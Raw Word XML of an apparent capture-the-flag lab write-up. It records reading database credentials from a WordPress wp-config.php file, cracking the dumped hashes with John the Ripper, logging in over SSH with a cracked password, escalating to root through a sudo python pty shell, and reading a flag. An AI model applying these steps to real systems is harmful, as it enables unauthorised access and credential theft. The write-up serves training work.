                  <wp:posOffset>3359144</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103179</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2231280" cy="286920"/>
                <wp:effectExtent l="57150" t="38100" r="36195" b="5651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231280" cy="28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1D6BE" id="Ink 9" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:263.8pt;margin-top:7.4pt;width:177.15pt;height:24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">
                <v:imagedata r:id="rId16" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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679219E5" wp14:editId="2BA874ED">
            <wp:extent cx="5943600" cy="3268980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2AAE" w14:textId="7C6D9938" w:rsidR="008E345A" w:rsidRDefault="001E5EC4" w:rsidP="00515299">
      <w:p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 w:rsidRPr="001E5EC4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flag4: 715dea6c055b9fe3337544932f2941ce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7878F98B" w14:textId="77777777" w:rsidR="00FC6F97" w:rsidRDefault="002144A9" w:rsidP="002144A9">
      <w:p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Exploits Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F078C" w14:textId="067D91BE" w:rsidR="002144A9" w:rsidRDefault="00FC6F97" w:rsidP="00FC6F97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:num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I went ahead and used the u</w:t>
      </w:r>
      <w:r w:rsidR="002144A9" w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nsalted password hash and the use of privilege escalation with </w:t>
      </w:r>
      <w:r w:rsidR="001C3A62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="002144A9" w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="004A1082">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="002144A9" w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27450422" w14:textId="77777777" w:rsidR="004A1082" w:rsidRPr="00FC6F97" w:rsidRDefault="004A1082" w:rsidP="004A1082">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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16ED9099" w14:textId="086F45FD" w:rsidR="002144A9" w:rsidRDefault="002144A9" w:rsidP="002144A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:num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 w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:r w:rsidR="00735A4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I was able to gain </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>access to the database credentials as Michael from the wp-config.php file, lifting username and password hashes using MySQL was next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCA483" w14:textId="77777777" w:rsidR="004A1082" w:rsidRPr="00FC6F97" w:rsidRDefault="004A1082" w:rsidP="004A1082">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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3E7EADBB" w14:textId="1D56038E" w:rsidR="002144A9" w:rsidRDefault="00E70A8D" w:rsidP="00FC6F97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:num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color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="002144A9" w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sernames and </w:t>
      </w:r>
      <w:r w:rsidR="000073D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="002144A9" w:rsidRPr="00FC6F97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password hashes were saved to the Kali machine in a file called wp_hashes.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA1764" w14:textId="77777777" w:rsidR="009C4445" w:rsidRPr="009C4445" w:rsidRDefault="009C4445" w:rsidP="009C4445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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5ECE01F6" w14:textId="77777777" w:rsidR="009C4445" w:rsidRDefault="009C4445" w:rsidP="009C4445">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E073E0" w14:textId="3222095D" w:rsidR="009C4445" w:rsidRDefault="009C4445" w:rsidP="009C4445">
      <w:p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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E256250" wp14:editId="5A3EB13B">
            <wp:extent cx="5943600" cy="3955415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E40FB" w14:textId="66D83FCA" w:rsidR="009C4445" w:rsidRPr="009C4445" w:rsidRDefault="008010B7" w:rsidP="009C4445">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1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111407FF" wp14:editId="1FB6C599">
            <wp:extent cx="5943600" cy="3595370"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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CE59D" w14:textId="5EECD0E7" w:rsidR="00032859" w:rsidRDefault="00032859" w:rsidP="00032859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032859">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>On the Kali machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00032859">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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I was able to run the John the Ripper command against </w:t>
      </w:r>
      <w:r w:rsidRPr="00032859">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the wp_hashes.txt to crack the hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185743B3" w14:textId="77777777" w:rsidR="00032859" w:rsidRPr="00032859" w:rsidRDefault="00032859" w:rsidP="00032859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31C3229E" w14:textId="77777777" w:rsidR="00032859" w:rsidRPr="00032859" w:rsidRDefault="00032859" w:rsidP="00032859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032859">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613E104" w14:textId="77777777" w:rsidR="00032859" w:rsidRDefault="00032859" w:rsidP="00032859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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032859">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>john wp_hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF3684" w14:textId="55C6142F" w:rsidR="00032859" w:rsidRDefault="008743EB" w:rsidP="00032859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B0126AB" wp14:editId="6F239EAA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1503</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3584832</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1700280" cy="203760"/>
                <wp:effectExtent l="38100" t="57150" r="52705" b="4445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700280" cy="20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4748C5" id="Ink 13" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-.8pt;margin-top:281.55pt;width:135.3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">
                <v:imagedata r:id="rId21" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DB4E6C"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0B6B3591" wp14:editId="6487E69F">
            <wp:extent cx="5943600" cy="3802380"/>
            <wp:effectExtent l="0" t="0" r="0" b="76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3B8C2" w14:textId="142B2AF5" w:rsidR="00D20465" w:rsidRDefault="00D20465" w:rsidP="00D20465">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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>Once Steven’s password hash was cracked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 by the John the Ripper application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 xml:space="preserve">, the next thing to do was SSH as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the user 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>Steven. Then as Steven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, I checked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 xml:space="preserve"> for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the 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 xml:space="preserve">privilege </w:t>
      </w:r>
      <w:r w:rsidR="00527FEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escalating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 xml:space="preserve"> to root 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user </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20465">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>with Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B931000" w14:textId="77777777" w:rsidR="00527FEF" w:rsidRPr="00527FEF" w:rsidRDefault="00527FEF" w:rsidP="00527FEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9A9C4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ssh steven@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40528EE8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proofErr w:type="gramStart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pw:pink</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4137CB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proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73063498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proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> python -c ‘import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501CA0DB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cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7553D24A" w14:textId="77777777" w:rsidR="00527FEF" w:rsidRP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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E669D51" w14:textId="371E7E48" w:rsidR="00527FEF" w:rsidRDefault="00527FEF" w:rsidP="00527FEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:num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 w:rsidRPr="00527FEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat flag4.tx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413CE9F2" w14:textId="3714CC69" w:rsidR="00527FEF" w:rsidRPr="00527FEF" w:rsidRDefault="00527FEF" w:rsidP="00527FEF">
      <w:pPr>
        <w:spacing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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F2AC71" wp14:editId="25BEDE1E">
            <wp:extent cx="5943600" cy="269430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EDD86" w14:textId="77777777" w:rsidR="00DB4E6C" w:rsidRPr="00032859" w:rsidRDefault="00DB4E6C" w:rsidP="00527FEF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098F99B1" w14:textId="2FDE6623" w:rsidR="004F0160" w:rsidRPr="008010B7" w:rsidRDefault="00527FEF" w:rsidP="008010B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020129C8" wp14:editId="2127A824">
            <wp:extent cx="5943600" cy="2562860"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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0160" w:rsidRPr="00801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7347"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C067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802535"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D6A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D5010"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92D0C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CA5571"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6526D01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E171902"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="266A0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B3476A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9BE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441F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6E00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036ADD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0881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D3DE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0CE8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CD7344"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79285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D42C04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87E6F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F25B18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB3898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4C0B9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D6A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D2AC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34C60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5C23AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEFA27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A606E0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D6A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4A44A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="376C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ECC09C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25FA3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53464B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD92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FE6947"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0ECE6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251DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D3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60C1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88BCF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4D4BEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C2840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C0765A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97205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905137">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="667370262">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1824154017">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="280263543">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1945071914">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1868790102">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="954094554">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1784228333">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2112241745">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="480194227">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1489053715">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="18164794">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="484249012">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1005325924">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="274487922">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1194423370">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1922255752">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="720714220">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1487163462">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="442923126">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="33509885">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1203053623">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1084381495">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="66489321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rYwMDUxNDKwMLNU0lEKTi0uzszPAykwqgUAB5NviSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00DE20DF"/>
    <w:rsid w:val="000073D7"/>
    <w:rsid w:val="00032859"/>
    <w:rsid w:val="00143700"/>
    <w:rsid w:val="00154A85"/>
    <w:rsid w:val="0016258D"/>
    <w:rsid w:val="001A6B75"/>
    <w:rsid w:val="001C3A62"/>
    <w:rsid w:val="001D04F4"/>
    <w:rsid w:val="001E5EC4"/>
    <w:rsid w:val="002144A9"/>
    <w:rsid w:val="00251121"/>
    <w:rsid w:val="00274255"/>
    <w:rsid w:val="002E721C"/>
    <w:rsid w:val="003D09DD"/>
    <w:rsid w:val="003E3DEE"/>
    <w:rsid w:val="003E3E75"/>
    <w:rsid w:val="004A1082"/>
    <w:rsid w:val="004B41DA"/>
    <w:rsid w:val="004F0160"/>
    <w:rsid w:val="00515299"/>
    <w:rsid w:val="00527FEF"/>
    <w:rsid w:val="00535128"/>
    <w:rsid w:val="00535269"/>
    <w:rsid w:val="00565DB2"/>
    <w:rsid w:val="005B6DCF"/>
    <w:rsid w:val="005C2F26"/>
    <w:rsid w:val="005C53B2"/>
    <w:rsid w:val="005C7BF7"/>
    <w:rsid w:val="006257A9"/>
    <w:rsid w:val="006561D3"/>
    <w:rsid w:val="006B20CD"/>
    <w:rsid w:val="006C3297"/>
    <w:rsid w:val="00735A4C"/>
    <w:rsid w:val="007712B8"/>
    <w:rsid w:val="008010B7"/>
    <w:rsid w:val="0085728F"/>
    <w:rsid w:val="008743EB"/>
    <w:rsid w:val="008E345A"/>
    <w:rsid w:val="009363D0"/>
    <w:rsid w:val="0094772A"/>
    <w:rsid w:val="00952AEF"/>
    <w:rsid w:val="009C4445"/>
    <w:rsid w:val="00A258EA"/>
    <w:rsid w:val="00BA736F"/>
    <w:rsid w:val="00C07EC0"/>
    <w:rsid w:val="00C33A5C"/>
    <w:rsid w:val="00CC7976"/>
    <w:rsid w:val="00CD589B"/>
    <w:rsid w:val="00CD7E77"/>
    <w:rsid w:val="00D20465"/>
    <w:rsid w:val="00D5225E"/>
    <w:rsid w:val="00D95F9D"/>
    <w:rsid w:val="00DB4E6C"/>
    <w:rsid w:val="00DE20DF"/>
    <w:rsid w:val="00E5608B"/>
    <w:rsid w:val="00E70A8D"/>
    <w:rsid w:val="00E807F2"/>
    <w:rsid w:val="00EA226C"/>
    <w:rsid w:val="00EB4A1F"/>
    <w:rsid w:val="00EC0F6E"/>
    <w:rsid w:val="00F026D4"/>
    <w:rsid w:val="00F10F97"/>
    <w:rsid w:val="00F65E38"/>
    <w:rsid w:val="00FC25EF"/>
    <w:rsid w:val="00FC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5FA73"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A9D17CA0-F3E8-437B-8C36-B6F53D818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20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20D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E20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E20D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20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20D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E20D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E20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E20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20DF"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DE20D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E20D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5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53B2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005C53B2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005C7B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0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4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167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mailto:michael@192.168.1.110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customXml" Target="ink/ink4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image" Target="media/image1.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2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22:42:27.82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22:42:57.1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65 80 24575,'-85'1'0,"-1"-4"0,1-3 0,-132-27 0,186 28 0,0 1 0,0 2 0,0 1 0,-42 5 0,-6-2 0,-171 14 0,75-14 0,-133-5 0,226-12 0,64 10 0,1 1 0,-1 1 0,-35-2 0,-585 6 0,451-17 0,-358 17 0,540-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,2 0 0,-1 0 0,0 0 0,1 1 0,-2 5 0,-1 0 0,1 0 0,0 1 0,1-1 0,0 1 0,1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,2 12 0,-1-20 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,4 1 0,7 2 0,1 0 0,-1 0 0,22 3 0,-3-1 0,45 27 0,-8-3 0,-44-24 0,1-1 0,34 2 0,4 2 0,-49-7 0,199 29 0,166-28 0,-199-6 0,-15 0 0,178 4 0,-214 13 0,-85-8 0,75 2 0,1469-9 0,-1560-2 0,0-1 0,41-10 0,-4 0 0,18 0 0,4-1 0,164-6 0,-97 18 0,119 4 0,-185 5 0,65 2 0,-137-8 0,1 0 0,-1 2 0,29 8 0,-28-7 0,1 1 0,0-2 0,19 1 0,255 11 0,-274-14 0,1 1 0,-1 1 0,33 10 0,8 0 0,29 5 0,66 9 0,-57-4 0,-77-17 0,0 0 0,0-2 0,0 0 0,25 0 0,155 12 0,-84-14 0,105-5 